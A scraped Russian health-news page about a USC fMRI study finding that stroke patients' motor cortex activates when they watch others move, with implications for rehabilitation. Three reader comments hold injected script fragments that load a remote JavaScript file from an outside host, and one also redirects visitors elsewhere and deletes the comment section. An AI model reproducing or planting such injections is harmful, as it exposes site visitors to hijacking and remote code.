Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Куда смотреть, чтобы мозг...  >>  Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта
 
Обратная связь
 

Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта

Размер шрифта
18 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Инсульт – это страшно! Он происходит из-за нарушения мозгового кровообращения. Часто после него развиваются двигательные нарушения, вплоть до полного паралича. Реабилитация таких больных по-прежнему является крайне трудной задачей для врачей. Но исследования открывают новые возможности в реабилитации таких пациентов и возвращение их к жизни.

В ходе недавнего исследования, проведенного на базе Университета Южной Калифорнии, было обнаружено, что моторная кора в мозге пациентов, перенесших инсульт, активизируется при наблюдении за физической деятельностью других людей. Этот факт открывает новые горизонты в сфере нейрореабилитации после инсульта.

Используя возможности функциональной магнитно-резонансной томографии (фМРТ), команда ученых занималась мониторингом активности головного мозга у 24 индивидуумов. Из них 12 перенесли инсульт, еще 12 были здоровыми добровольцами подходящего возраста. Ученые оценивались активность мозга, в то время как испытуемые наблюдали за посторонними лицами. Последние выполняли простые физические действия с помощью рук; простые, но крайне затруднительные (или даже невозможные) для людей, которые перенесли инсульт.

Исследователи обнаружили, что у обычного здорового человека в этот момент активизируется зрительная кора, как и положено. У пациентов с инсультом, однако, наблюдалась принципиально другая картина: у них происходила стимуляция еще и моторной (двигательной) коры, особенно в пораженном полушарии. В наибольшей степени этот эффект проявлялся в том случае, когда посторонний человек выполнял самые трудные для пациента движения.

«Активизация участков коры рядом с очагом поражения – это своего рода тренировка мозга, которая облегчает дальнейшее его восстановление», – говорит Кэтлин Гаррисон, глава исследовательской группы. «Если нам удастся индуцировать физиологическую активность в поврежденных участках мозга, это поможет нам достичь более эффективных результатов в реабилитационных мероприятиях».

В прошлом некоторые специалисты уже отмечали многообещающий потенциал такого «моторного наблюдения», но Гаррисон и ее коллеги впервые приоткрыли завесу тайны над возможными механизмами этого феномена.

«Мы могли бы показывать пациентам видео физиотерапевтических процедур, которые им предстоит пройти, – говорит Гаррисон. «Более чем вероятно, что это позволит сократить время двигательной реабилитации больных, перенесших инсульт».

Это исследование подтверждает главное – людям после инсульта нужно общение, нужно как можно больше стимул из-вне. Если ваш близкий попал в беду – будьте с ним. Просто поддержка и общение могут повлиять на его жизнь.

Подробнее об инсульте вы можете узнать в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как первым увидеть в толпе звезду? У нас есть научный ответ!   Почему вы зеваете? Чтобы остудить мозги!   Оказывается, мозг знает, как нам не выпить лишнего! Почему же мы напиваемся?   Горький шоколад полезен для сердца! Но все благодаря бактериям!  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Зачем спать 10 затем
Что заставит вас храпеть
Чем полезен секс?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.